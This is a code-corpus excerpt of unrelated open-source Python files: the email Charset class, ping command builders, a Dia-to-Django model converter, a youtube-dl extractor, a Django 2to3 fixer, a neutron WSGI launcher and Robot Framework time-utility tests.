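# After this, Charset('macroman') resolves the alias, header-encodes with
# quoted-printable, body-encodes with base64, and converts output to utf-8.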
class Charset:
"""Map character sets to their email properties.
This class provides information about the requirements imposed on email
for a specific character set. It also provides convenience routines for
converting between character sets, given the availability of the
applicable codecs. Given a character set, it will do its best to provide
information on how to use that character set in an email in an
RFC-compliant way.
Certain character sets must be encoded with quoted-printable or base64
when used in email headers or bodies. Certain character sets must be
converted outright, and are not allowed in email. Instances of this
module expose the following information about a character set:
input_charset: The initial character set specified. Common aliases
are converted to their `official' email names (e.g. latin_1
is converted to iso-8859-1). Defaults to 7-bit us-ascii.
header_encoding: If the character set must be encoded before it can be
used in an email header, this attribute will be set to
Charset.QP (for quoted-printable), Charset.BASE64 (for
base64 encoding), or Charset.SHORTEST for the shortest of
QP or BASE64 encoding. Otherwise, it will be None.
body_encoding: Same as header_encoding, but describes the encoding for the
mail message's body, which indeed may be different than the
header encoding. Charset.SHORTEST is not allowed for
body_encoding.
    output_charset: Some character sets must be converted before they can be
used in email headers or bodies. If the input_charset is
one of them, this attribute will contain the name of the
charset output will be converted to. Otherwise, it will
be None.
input_codec: The name of the Python codec used to convert the
input_charset to Unicode. If no conversion codec is
necessary, this attribute will be None.
output_codec: The name of the Python codec used to convert Unicode
to the output_charset. If no conversion codec is necessary,
this attribute will have the same value as the input_codec.
"""
def __init__(self, input_charset=DEFAULT_CHARSET):
# RFC 2046, $4.1.2 says charsets are not case sensitive. We coerce to
# unicode because its .lower() is locale insensitive. If the argument
# is already a unicode, we leave it at that, but ensure that the
# charset is ASCII, as the standard (RFC XXX) requires.
try:
if isinstance(input_charset, unicode):
input_charset.encode('ascii')
else:
input_charset = unicode(input_charset, 'ascii')
except UnicodeError:
raise errors.CharsetError(input_charset)
input_charset = input_charset.lower().encode('ascii')
# Set the input charset after filtering through the aliases and/or codecs
if not (input_charset in ALIASES or input_charset in CHARSETS):
try:
input_charset = codecs.lookup(input_charset).name
except LookupError:
pass
self.input_charset = ALIASES.get(input_charset, input_charset)
# We can try to guess which encoding and conversion to use by the
# charset_map dictionary. Try that first, but let the user override
# it.
henc, benc, conv = CHARSETS.get(self.input_charset,
(SHORTEST, BASE64, None))
if not conv:
conv = self.input_charset
# Set the attributes, allowing the arguments to override the default.
self.header_encoding = henc
self.body_encoding = benc
self.output_charset = ALIASES.get(conv, conv)
# Now set the codecs. If one isn't defined for input_charset,
# guess and try a Unicode codec with the same name as input_codec.
self.input_codec = CODEC_MAP.get(self.input_charset,
self.input_charset)
self.output_codec = CODEC_MAP.get(self.output_charset,
self.output_charset)
def __str__(self):
return self.input_charset.lower()
__repr__ = __str__
def __eq__(self, other):
return str(self) == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def get_body_encoding(self):
"""Return the content-transfer-encoding used for body encoding.
This is either the string `quoted-printable' or `base64' depending on
the encoding used, or it is a function in which case you should call
the function with a single argument, the Message object being
encoded. The function should then set the Content-Transfer-Encoding
header itself to whatever is appropriate.
Returns "quoted-printable" if self.body_encoding is QP.
Returns "base64" if self.body_encoding is BASE64.
Returns "7bit" otherwise.
"""
assert self.body_encoding != SHORTEST
if self.body_encoding == QP:
return 'quoted-printable'
elif self.body_encoding == BASE64:
return 'base64'
else:
return encode_7or8bit
def convert(self, s):
"""Convert a string from the input_codec to the output_codec."""
if self.input_codec != self.output_codec:
return unicode(s, self.input_codec).encode(self.output_codec)
else:
return s
def to_splittable(self, s):
"""Convert a possibly multibyte string to a safely splittable format.
Uses the input_codec to try and convert the string to Unicode, so it
can be safely split on character boundaries (even for multibyte
characters).
Returns the string as-is if it isn't known how to convert it to
Unicode with the input_charset.
Characters that could not be converted to Unicode will be replaced
with the Unicode replacement character U+FFFD.
"""
if isinstance(s, unicode) or self.input_codec is None:
return s
try:
return unicode(s, self.input_codec, 'replace')
except LookupError:
# Input codec not installed on system, so return the original
# string unchanged.
return s
def from_splittable(self, ustr, to_output=True):
"""Convert a splittable string back into an encoded string.
Uses the proper codec to try and convert the string from Unicode back
into an encoded format. Return the string as-is if it is not Unicode,
or if it could not be converted from Unicode.
Characters that could not be converted from Unicode will be replaced
with an appropriate character (usually '?').
If to_output is True (the default), uses output_codec to convert to an
encoded format. If to_output is False, uses input_codec.
"""
if to_output:
codec = self.output_codec
else:
codec = self.input_codec
if not isinstance(ustr, unicode) or codec is None:
return ustr
try:
return ustr.encode(codec, 'replace')
except LookupError:
# Output codec not installed
return ustr
def get_output_charset(self):
"""Return the output character set.
This is self.output_charset if that is not None, otherwise it is
self.input_charset.
"""
return self.output_charset or self.input_charset
def encoded_header_len(self, s):
"""Return the length of the encoded header string."""
cset = self.get_output_charset()
# The len(s) of a 7bit encoding is len(s)
if self.header_encoding == BASE64:
return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == QP:
return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
return min(lenb64, lenqp) + len(cset) + MISC_LEN
else:
return len(s)
def header_encode(self, s, convert=False):
"""Header-encode a string, optionally converting it to output_charset.
If convert is True, the string will be converted from the input
charset to the output charset automatically. This is not useful for
multibyte character sets, which have line length issues (multibyte
characters must be split on a character, not a byte boundary); use the
high-level Header class to deal with these issues. convert defaults
to False.
The type of encoding (base64 or quoted-printable) will be based on
self.header_encoding.
"""
cset = self.get_output_charset()
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.header_encoding == BASE64:
return email.base64mime.header_encode(s, cset)
elif self.header_encoding == QP:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
if lenb64 < lenqp:
return email.base64mime.header_encode(s, cset)
else:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
else:
return s
def body_encode(self, s, convert=True):
"""Body-encode a string and convert it to output_charset.
If convert is True (the default), the string will be converted from
the input charset to output charset automatically. Unlike
header_encode(), there are no issues with byte boundaries and
multibyte charsets in email bodies, so this is usually pretty safe.
The type of encoding (base64 or quoted-printable) will be based on
self.body_encoding.
"""
if convert:
s = self.convert(s)
        # 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.body_encoding is BASE64:
return email.base64mime.body_encode(s)
elif self.body_encoding is QP:
return email.quoprimime.body_encode(s)
else:
return s
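# Illustrative behaviour of the Charset class above, using the built-in
# registry (the values in the trailing comments are the expected results):
#
#     c = Charset('latin_1')        # alias resolves to iso-8859-1
#     c.get_body_encoding()         # -> 'quoted-printable'
#     c.get_output_charset()        # -> 'iso-8859-1'
#     str(Charset('ascii'))         # -> 'us-ascii'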
| gpl-3.0 |
thombashi/pingparsing | pingparsing/_cmd_maker.py | 1 | 7021 | import abc
import math
from typing import List, Optional
import humanreadable as hr
from subprocrunner.typing import Command
from typepy import Integer
from ._typing import PingAddOpts
DEFAULT_DEADLINE = 3
class PingCmdMaker(metaclass=abc.ABCMeta):
def __init__(
self,
count: Optional[int] = None,
deadline: Optional[hr.Time] = None,
timeout: Optional[hr.Time] = None,
packet_size: Optional[int] = None,
ttl: Optional[int] = None,
interface: Optional[str] = None,
is_ipv6: bool = False,
timestamp: bool = False,
auto_codepage: bool = False,
ping_option: PingAddOpts = "",
):
self.count = count
if self.count is not None:
self.count = Integer(self.count).convert()
self.deadline = deadline
self.timeout = timeout
self._packet_size = packet_size
self._ttl = ttl
self.interface = interface
self._is_ipv6 = is_ipv6
self._timestamp = timestamp
self.auto_codepage = auto_codepage
self.ping_option = ping_option
def make_cmd(self, destination: str) -> Command:
command_items = (
self._get_initial_command()
+ self._get_ping_command()
+ self._get_interface_option()
+ self._get_deadline_option()
+ self._get_timeout_option()
+ self._get_count_option()
+ self._get_packet_size_option()
+ self._get_ttl_option()
)
if self._timestamp:
command_items.extend(self._get_timestamp_option())
if isinstance(self.ping_option, str):
command_items.extend(self.ping_option.strip().split())
else:
command_items.extend(self.ping_option)
command_items.append(self._get_destination_host(destination))
if self._require_shell_command():
return " ".join(command_items)
return command_items
def _get_initial_command(self) -> List[str]:
return []
@abc.abstractmethod
def _get_destination_host(self, destination: str) -> str:
raise NotImplementedError()
@abc.abstractmethod
def _get_ping_command(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_quiet_option(self) -> str:
raise NotImplementedError()
@abc.abstractmethod
def _get_timestamp_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_deadline_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_timeout_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_count_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_packet_size_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_ttl_option(self) -> List[str]:
raise NotImplementedError()
def _get_interface_option(self) -> List[str]:
return []
def _require_shell_command(self) -> bool:
return False
class PosixPingCmdMaker(PingCmdMaker):
def _get_destination_host(self, destination: str) -> str:
return destination
def _get_ping_command(self) -> List[str]:
if self._is_ipv6:
return ["ping6"]
return ["ping"]
def _get_quiet_option(self) -> str:
return "-q"
def _get_timestamp_option(self) -> List[str]:
return ["-D", "-O"]
def _get_count_option(self) -> List[str]:
if self.count is None:
return []
return ["-c", str(self.count)]
def _get_packet_size_option(self) -> List[str]:
if self._packet_size is None:
return []
return ["-s", str(self._packet_size)]
class MacosPingCmdMaker(PosixPingCmdMaker):
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-T", str(self._ttl)]
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
if self._is_ipv6:
# there is no timeout option for macOS ping6.
# so, using -i and -c option to simulate timeout.
return ["-i", "1", "-c", str(deadline)]
return ["-t", str(deadline)]
def _get_timeout_option(self) -> List[str]:
return []
class LinuxPingCmdMaker(PosixPingCmdMaker):
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-t", str(self._ttl)]
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
return ["-w", str(deadline)]
def _get_timeout_option(self) -> List[str]:
if self.timeout is None:
return []
return ["-W", str(int(math.ceil(self.timeout.seconds)))]
def _get_interface_option(self) -> List[str]:
if not self.interface:
return []
return ["-I", self.interface]
class WindowsPingCmdMaker(PingCmdMaker):
def _get_initial_command(self) -> List[str]:
if self.auto_codepage:
return ["chcp 437 &"]
return []
def _get_destination_host(self, destination: str) -> str:
if self._is_ipv6:
return "{:s}%{}".format(destination, self.interface)
return destination
def _get_ping_command(self) -> List[str]:
return ["ping"]
def _get_quiet_option(self) -> str:
return ""
def _get_timestamp_option(self) -> List[str]:
return []
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
        # ping on Windows does not have an option equivalent to the deadline option.
return ["-n", str(deadline)]
def _get_timeout_option(self) -> List[str]:
if self.timeout is None:
return []
return ["-w", str(int(math.ceil(self.timeout.milliseconds)))]
def _get_count_option(self) -> List[str]:
if self.count is None:
return []
return ["-n", str(self.count)]
def _get_packet_size_option(self) -> List[str]:
if self._packet_size is None:
return []
return ["-l", str(self._packet_size)]
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-i", str(self._ttl)]
def _require_shell_command(self) -> bool:
return self.auto_codepage
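# Illustrative composition performed by make_cmd() above (hypothetical host
# and options; hr.Time is assumed here to accept a plain string like
# "2 seconds"):
#
#     maker = LinuxPingCmdMaker(count=4, timeout=hr.Time("2 seconds"))
#     maker.make_cmd("example.com")
#     # -> ['ping', '-W', '2', '-c', '4', 'example.com']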
| mit |
hdinsight/hue | desktop/core/ext-py/django-extensions-1.5.0/django_extensions/utils/dia2django.py | 37 | 10304 | # -*- coding: UTF-8 -*-
##Author Igor Támara [email protected]
##Use this little program as you wish. If you
#include it in your work, let others know you
#are using it, preserving this note. You have
#the right to make derivative works. Use it
#at your own risk.
#Tested to work on(etch testing 13-08-2007):
# Python 2.4.4 (#2, Jul 17 2007, 11:56:54)
# [GCC 4.1.3 20070629 (prerelease) (Debian 4.1.2-13)] on linux2
dependclasses = ["User", "Group", "Permission", "Message"]
import re
import six
import sys
import gzip
import codecs
from xml.dom.minidom import * # NOQA
#Type dictionary translation types SQL -> Django
tsd = {
"text": "TextField",
"date": "DateField",
"varchar": "CharField",
"int": "IntegerField",
"float": "FloatField",
"serial": "AutoField",
"boolean": "BooleanField",
"numeric": "FloatField",
"timestamp": "DateTimeField",
"bigint": "IntegerField",
"datetime": "DateTimeField",
"date": "DateField",
"time": "TimeField",
"bool": "BooleanField",
"int": "IntegerField",
}
#convert varchar -> CharField
v2c = re.compile('varchar\((\d+)\)')
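# Illustrative translation using tsd and v2c above: a dia attribute typed
# "varchar(80)" becomes "models.CharField(max_length=80)", while one typed
# "timestamp" becomes "models.DateTimeField()" in the generated model code.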
def index(fks, id):
"""Looks for the id on fks, fks is an array of arrays, each array has on [1]
the id of the class in a dia diagram. When not present returns None, else
it returns the position of the class with id on fks"""
for i, j in fks.items():
if fks[i][1] == id:
return i
return None
def addparentstofks(rels, fks):
"""Gets a list of relations, between parents and sons and a dict of
clases named in dia, and modifies the fks to add the parent as fk to get
order on the output of classes and replaces the base class of the son, to
put the class parent name.
"""
for j in rels:
son = index(fks, j[1])
parent = index(fks, j[0])
fks[son][2] = fks[son][2].replace("models.Model", parent)
if parent not in fks[son][0]:
fks[son][0].append(parent)
def dia2django(archivo):
models_txt = ''
f = codecs.open(archivo, "rb")
#dia files are gzipped
data = gzip.GzipFile(fileobj=f).read()
ppal = parseString(data)
#diagram -> layer -> object -> UML - Class -> name, (attribs : composite -> name,type)
datos = ppal.getElementsByTagName("dia:diagram")[0].getElementsByTagName("dia:layer")[0].getElementsByTagName("dia:object")
clases = {}
herit = []
imports = six.u("")
for i in datos:
#Look for the classes
if i.getAttribute("type") == "UML - Class":
myid = i.getAttribute("id")
for j in i.childNodes:
if j.nodeType == Node.ELEMENT_NODE and j.hasAttributes():
if j.getAttribute("name") == "name":
actclas = j.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
myname = "\nclass %s(models.Model) :\n" % actclas
clases[actclas] = [[], myid, myname, 0]
if j.getAttribute("name") == "attributes":
for l in j.getElementsByTagName("dia:composite"):
if l.getAttribute("type") == "umlattribute":
#Look for the attribute name and type
for k in l.getElementsByTagName("dia:attribute"):
if k.getAttribute("name") == "name":
nc = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
elif k.getAttribute("name") == "type":
tc = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
elif k.getAttribute("name") == "value":
val = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
if val == '##':
val = ''
elif k.getAttribute("name") == "visibility" and k.getElementsByTagName("dia:enum")[0].getAttribute("val") == "2":
if tc.replace(" ", "").lower().startswith("manytomanyfield("):
#If we find a class not in our model that is marked as being to another model
newc = tc.replace(" ", "")[16:-1]
if dependclasses.count(newc) == 0:
dependclasses.append(newc)
if tc.replace(" ", "").lower().startswith("foreignkey("):
#If we find a class not in our model that is marked as being to another model
newc = tc.replace(" ", "")[11:-1]
if dependclasses.count(newc) == 0:
dependclasses.append(newc)
#Mapping SQL types to Django
varch = v2c.search(tc)
if tc.replace(" ", "").startswith("ManyToManyField("):
myfor = tc.replace(" ", "")[16:-1]
if actclas == myfor:
#In case of a recursive type, we use 'self'
tc = tc.replace(myfor, "'self'")
elif clases[actclas][0].count(myfor) == 0:
#Adding related class
if myfor not in dependclasses:
#In case we are using Auth classes or external via protected dia visibility
clases[actclas][0].append(myfor)
tc = "models." + tc
if len(val) > 0:
tc = tc.replace(")", "," + val + ")")
elif tc.find("Field") != -1:
if tc.count("()") > 0 and len(val) > 0:
tc = "models.%s" % tc.replace(")", "," + val + ")")
else:
tc = "models.%s(%s)" % (tc, val)
elif tc.replace(" ", "").startswith("ForeignKey("):
myfor = tc.replace(" ", "")[11:-1]
if actclas == myfor:
#In case of a recursive type, we use 'self'
tc = tc.replace(myfor, "'self'")
elif clases[actclas][0].count(myfor) == 0:
#Adding foreign classes
if myfor not in dependclasses:
#In case we are using Auth classes
clases[actclas][0].append(myfor)
tc = "models." + tc
if len(val) > 0:
tc = tc.replace(")", "," + val + ")")
elif varch is None:
tc = "models." + tsd[tc.strip().lower()] + "(" + val + ")"
else:
tc = "models.CharField(max_length=" + varch.group(1) + ")"
if len(val) > 0:
tc = tc.replace(")", ", " + val + " )")
if not (nc == "id" and tc == "AutoField()"):
clases[actclas][2] = clases[actclas][2] + (" %s = %s\n" % (nc, tc))
elif i.getAttribute("type") == "UML - Generalization":
mycons = ['A', 'A']
a = i.getElementsByTagName("dia:connection")
for j in a:
if len(j.getAttribute("to")):
mycons[int(j.getAttribute("handle"))] = j.getAttribute("to")
print(mycons)
if 'A' not in mycons:
herit.append(mycons)
elif i.getAttribute("type") == "UML - SmallPackage":
a = i.getElementsByTagName("dia:string")
for j in a:
if len(j.childNodes[0].data[1:-1]):
imports += six.u("from %s.models import *" % j.childNodes[0].data[1:-1])
addparentstofks(herit, clases)
#Ordering the appearance of classes
    #First we make a list of the classes each class is related to.
ordered = []
for j, k in six.iteritems(clases):
        k[2] = k[2] + "\n    def %s(self):\n        return u\"\"\n" % (("__str__" if six.PY3 else "__unicode__"), )
for fk in k[0]:
if fk not in dependclasses:
clases[fk][3] += 1
ordered.append([j] + k)
i = 0
while i < len(ordered):
mark = i
j = i + 1
while j < len(ordered):
if ordered[i][0] in ordered[j][1]:
mark = j
j += 1
if mark == i:
i += 1
else:
            # swap ordered[i] and ordered[mark] so that ordered[i] ends up at the end
if ordered[i][0] in ordered[mark][1] and ordered[mark][0] in ordered[i][1]:
#Resolving simplistic circular ForeignKeys
print("Not able to resolve circular ForeignKeys between %s and %s" % (ordered[i][1], ordered[mark][0]))
break
a = ordered[i]
ordered[i] = ordered[mark]
ordered[mark] = a
if i == len(ordered) - 1:
break
ordered.reverse()
if imports:
models_txt = str(imports)
for i in ordered:
models_txt += '%s\n' % str(i[3])
return models_txt
if __name__ == '__main__':
if len(sys.argv) == 2:
dia2django(sys.argv[1])
else:
print(" Use:\n \n " + sys.argv[0] + " diagram.dia\n\n")
| apache-2.0 |
bastik/youtube-dl | youtube_dl/extractor/academicearth.py | 95 | 1399 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class AcademicEarthCourseIE(InfoExtractor):
_VALID_URL = r'^https?://(?:www\.)?academicearth\.org/playlists/(?P<id>[^?#/]+)'
IE_NAME = 'AcademicEarth:Course'
_TEST = {
'url': 'http://academicearth.org/playlists/laws-of-nature/',
'info_dict': {
'id': 'laws-of-nature',
'title': 'Laws of Nature',
'description': 'Introduce yourself to the laws of nature with these free online college lectures from Yale, Harvard, and MIT.',
},
'playlist_count': 4,
}
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._html_search_regex(
r'<h1 class="playlist-name"[^>]*?>(.*?)</h1>', webpage, 'title')
description = self._html_search_regex(
r'<p class="excerpt"[^>]*?>(.*?)</p>',
webpage, 'description', fatal=False)
urls = re.findall(
r'<li class="lecture-preview">\s*?<a target="_blank" href="([^"]+)">',
webpage)
entries = [self.url_result(u) for u in urls]
return {
'_type': 'playlist',
'id': playlist_id,
'title': title,
'description': description,
'entries': entries,
}
| unlicense |
frederick-masterton/django | django/utils/2to3_fixes/fix_unicode.py | 349 | 1181 | """Fixer for __unicode__ methods.
Uses the django.utils.encoding.python_2_unicode_compatible decorator.
"""
from __future__ import unicode_literals
from lib2to3 import fixer_base
from lib2to3.fixer_util import find_indentation, Name, syms, touch_import
from lib2to3.pgen2 import token
from lib2to3.pytree import Leaf, Node
class FixUnicode(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
classdef< 'class' any+ ':'
suite< any*
funcdef< 'def' unifunc='__unicode__'
parameters< '(' NAME ')' > any+ >
any* > >
"""
def transform(self, node, results):
unifunc = results["unifunc"]
strfunc = Name("__str__", prefix=unifunc.prefix)
unifunc.replace(strfunc)
klass = node.clone()
klass.prefix = '\n' + find_indentation(node)
decorator = Node(syms.decorator, [Leaf(token.AT, "@"), Name('python_2_unicode_compatible')])
decorated = Node(syms.decorated, [decorator, klass], prefix=node.prefix)
node.replace(decorated)
touch_import('django.utils.encoding', 'python_2_unicode_compatible', decorated)
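# Illustrative effect of this fixer (hypothetical input class): a class body
# containing
#
#     def __unicode__(self):
#         return self.name
#
# is rewritten so the method is named __str__, the whole class is wrapped
# with @python_2_unicode_compatible, and the corresponding import is added
# by touch_import() above.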
| bsd-3-clause |
cloudbase/neutron | neutron/server/wsgi_pecan.py | 9 | 1026 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from neutron._i18n import _LI
from neutron.pecan_wsgi import app as pecan_app
from neutron.server import wsgi_eventlet
from neutron import service
LOG = log.getLogger(__name__)
def pecan_wsgi_server():
LOG.info(_LI("Pecan WSGI server starting..."))
application = pecan_app.setup_app()
neutron_api = service.run_wsgi_app(application)
wsgi_eventlet.start_api_and_rpc_workers(neutron_api)
| apache-2.0 |
eric-stanley/robotframework | utest/utils/test_robottime.py | 4 | 17337 | import unittest
import re
import time
import datetime
from robot.utils.asserts import (assert_equal, assert_raises_with_msg,
assert_true, assert_not_none)
from robot.utils.robottime import (timestr_to_secs, secs_to_timestr, get_time,
parse_time, format_time, get_elapsed_time,
get_timestamp, get_start_timestamp,
timestamp_to_secs, elapsed_time_to_string,
_get_timetuple)
EXAMPLE_TIME = time.mktime(datetime.datetime(2007, 9, 20, 16, 15, 14).timetuple())
class TestTime(unittest.TestCase):
def test_get_timetuple_excluding_millis(self):
assert_equal(_get_timetuple(12345)[:-1], time.localtime(12345)[:6])
def test_get_current_timetuple_excluding_millis(self):
while True:
expected = time.localtime()
actual = _get_timetuple()
# make sure got same times and _get_timetuple() did not round millis
if expected == time.localtime() and actual[-1] > 0:
break
assert_equal(actual[:-1], expected[:6])
def test_get_timetuple_millis(self):
assert_equal(_get_timetuple(12345)[-2:], (45, 0))
assert_equal(_get_timetuple(12345.12345)[-2:], (45, 123))
assert_equal(_get_timetuple(12345.67890)[-2:], (45, 679))
assert_equal(_get_timetuple(12345.99999)[-2:], (46, 0))
def test_timestr_to_secs_with_numbers(self):
for inp, exp in [(1, 1),
(42, 42),
(1.1, 1.1),
(3.142, 3.142),
(-1, -1),
(-1.1, -1.1),
(0, 0),
(0.55555, 0.556),
(11.111111, 11.111),
('1e2', 100),
('-1.5e3', -1500)]:
assert_equal(timestr_to_secs(inp), exp, inp)
if not isinstance(inp, basestring):
assert_equal(timestr_to_secs(str(inp)), exp, inp)
def test_timestr_to_secs_with_time_string(self):
for inp, exp in [('1s', 1),
('0 day 1 MINUTE 2 S 42 millis', 62.042),
('1minute 0sec 10 millis', 60.01),
('9 9 secs 5 3 4 m i l l i s e co n d s', 99.534),
('10DAY10H10M10SEC', 900610),
('1day 23h 46min 7s 666ms', 171967.666),
('1.5min 1.5s', 91.5),
('1.5 days', 60*60*36),
('1 day', 60*60*24),
('2 days', 2*60*60*24),
('1 d', 60*60*24),
('1 hour', 60*60),
('3 hours', 3*60*60),
('1 h', 60*60),
('1 minute', 60),
('2 minutes', 2*60),
('1 min', 60),
('2 mins', 2*60),
('1 m', 60),
('1 second', 1),
('2 seconds', 2),
('1 sec', 1),
('2 secs', 2),
('1 s', 1),
('1 millisecond', 0.001),
('2 milliseconds', 0.002),
('1 millisec', 0.001),
('2 millisecs', 0.002),
('1234 millis', 1.234),
('1 msec', 0.001),
('2 msecs', 0.002),
('1 ms', 0.001),
('-1s', -1),
('- 1 min 2 s', -62),
('0.1millis', 0),
('0.5ms', 0.001),
('0day 0hour 0minute 0seconds 0millisecond', 0)]:
assert_equal(timestr_to_secs(inp), exp, inp)
def test_timestr_to_secs_with_timer_string(self):
for inp, exp in [('00:00:00', 0),
('00:00:01', 1),
('01:02:03', 3600 + 2*60 + 3),
('100:00:00', 100*3600),
('1:00:00', 3600),
('11:00:00', 11*3600),
('00:00', 0),
('00:01', 1),
('42:01', 42*60 + 1),
('100:00', 100*60),
('100:100', 100*60 + 100),
('100:100:100', 100*3600 + 100*60 + 100),
('1:1:1', 3600 + 60 + 1),
('0001:0001:0001', 3600 + 60 + 1),
('-00:00:00', 0),
('-00:01:10', -70),
('-1:2:3', -3600 - 2*60 - 3),
('+00:00:00', 0),
('+00:01:10', 70),
('+1:2:3', 3600 + 2*60 + 3),
('00:00:00.0', 0),
('00:00:00.000', 0),
('00:00:00.000000000', 0),
('00:00:00.1', 0.1),
('00:00:00.42', 0.42),
('00:00:00.001', 0.001),
('00:00:00.123', 0.123),
('00:00:00.1234', 0.123),
('00:00:00.12345', 0.123),
('00:00:00.12356', 0.124),
('00:00:00.999', 0.999),
('00:00:00.9995001', 1),
('00:00:00.000000001', 0)]:
assert_equal(timestr_to_secs(inp), exp, inp)
if '.' not in inp:
inp += '.500'
exp += 0.5 if inp[0] != '-' else -0.5
assert_equal(timestr_to_secs(inp), exp, inp)
def test_timestr_to_secs_custom_rounding(self):
secs = 0.123456789
for round_to in 0, 1, 6:
expected = round(secs, round_to)
assert_equal(timestr_to_secs(secs, round_to), expected)
assert_equal(timestr_to_secs(str(secs), round_to), expected)
def test_timestr_to_secs_no_rounding(self):
secs = 0.123456789
assert_equal(timestr_to_secs(secs, round_to=None), secs)
assert_equal(timestr_to_secs(str(secs), round_to=None), secs)
def test_timestr_to_secs_with_invalid(self):
for inv in ['', 'foo', 'foo days', '1sec 42 millis 3', '1min 2w', None]:
assert_raises_with_msg(ValueError, "Invalid time string '%s'." % inv,
timestr_to_secs, inv)
def test_secs_to_timestr(self):
for inp, compact, verbose in [
(0.001, '1ms', '1 millisecond'),
(0.002, '2ms', '2 milliseconds'),
(0.9999, '1s', '1 second'),
(1, '1s', '1 second'),
(1.9999, '2s', '2 seconds'),
(2, '2s', '2 seconds'),
(60, '1min', '1 minute'),
(120, '2min', '2 minutes'),
(3600, '1h', '1 hour'),
(7200, '2h', '2 hours'),
(60*60*24, '1d', '1 day'),
(60*60*48, '2d', '2 days'),
(171967.667, '1d 23h 46min 7s 667ms',
'1 day 23 hours 46 minutes 7 seconds 667 milliseconds'),
(7320, '2h 2min', '2 hours 2 minutes'),
(7210.05, '2h 10s 50ms', '2 hours 10 seconds 50 milliseconds') ,
(11.1111111, '11s 111ms', '11 seconds 111 milliseconds'),
(0.55555555, '556ms', '556 milliseconds'),
(0, '0s', '0 seconds'),
(9999.9999, '2h 46min 40s', '2 hours 46 minutes 40 seconds'),
(10000, '2h 46min 40s', '2 hours 46 minutes 40 seconds'),
(-1, '- 1s', '- 1 second'),
(-171967.667, '- 1d 23h 46min 7s 667ms',
'- 1 day 23 hours 46 minutes 7 seconds 667 milliseconds')]:
assert_equal(secs_to_timestr(inp, compact=True), compact, inp)
assert_equal(secs_to_timestr(inp), verbose, inp)
def test_format_time(self):
timetuple = (2005, 11, 2, 14, 23, 12, 123)
for seps, exp in [(('-',' ',':'), '2005-11-02 14:23:12'),
(('', '-', ''), '20051102-142312'),
(('-',' ',':','.'), '2005-11-02 14:23:12.123')]:
assert_equal(format_time(timetuple, *seps), exp)
def test_get_timestamp(self):
for seps, pattern in [((), '^\d{8} \d\d:\d\d:\d\d.\d\d\d$'),
(('',' ',':',None), '^\d{8} \d\d:\d\d:\d\d$'),
(('','','',None), '^\d{14}$'),
(('-',' ',':',';'),
'^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d;\d\d\d$')]:
ts = get_timestamp(*seps)
assert_not_none(re.search(pattern, ts),
"'%s' didn't match '%s'" % (ts, pattern), False)
def test_get_start_timestamp(self):
start = get_start_timestamp(millissep='.')
time.sleep(0.002)
assert_equal(get_start_timestamp(millissep='.'), start)
def test_timestamp_to_secs_with_default(self):
assert_equal(timestamp_to_secs('20070920 16:15:14.123'), EXAMPLE_TIME+0.123)
def test_timestamp_to_secs_with_seps(self):
result = timestamp_to_secs('2007-09-20#16x15x14M123', ('-','#','x','M'))
assert_equal(result, EXAMPLE_TIME+0.123)
def test_timestamp_to_secs_with_millis(self):
result = timestamp_to_secs('20070920 16:15:14.123')
assert_equal(result, EXAMPLE_TIME+0.123)
def test_get_elapsed_time(self):
starttime = '20060526 14:01:10.500'
for endtime, expected in [('20060526 14:01:10.500', 0),
('20060526 14:01:10.500',0),
('20060526 14:01:10.501', 1),
('20060526 14:01:10.777', 277),
('20060526 14:01:11.000', 500),
('20060526 14:01:11.321', 821),
('20060526 14:01:11.499', 999),
('20060526 14:01:11.500', 1000),
('20060526 14:01:11.501', 1001),
('20060526 14:01:11.000', 500),
('20060526 14:01:11.500', 1000),
('20060526 14:01:11.510', 1010),
('20060526 14:01:11.512',1012),
('20060601 14:01:10.499', 518399999),
('20060601 14:01:10.500', 518400000),
('20060601 14:01:10.501', 518400001)]:
actual = get_elapsed_time(starttime, endtime)
assert_equal(actual, expected, endtime)
def test_get_elapsed_time_negative(self):
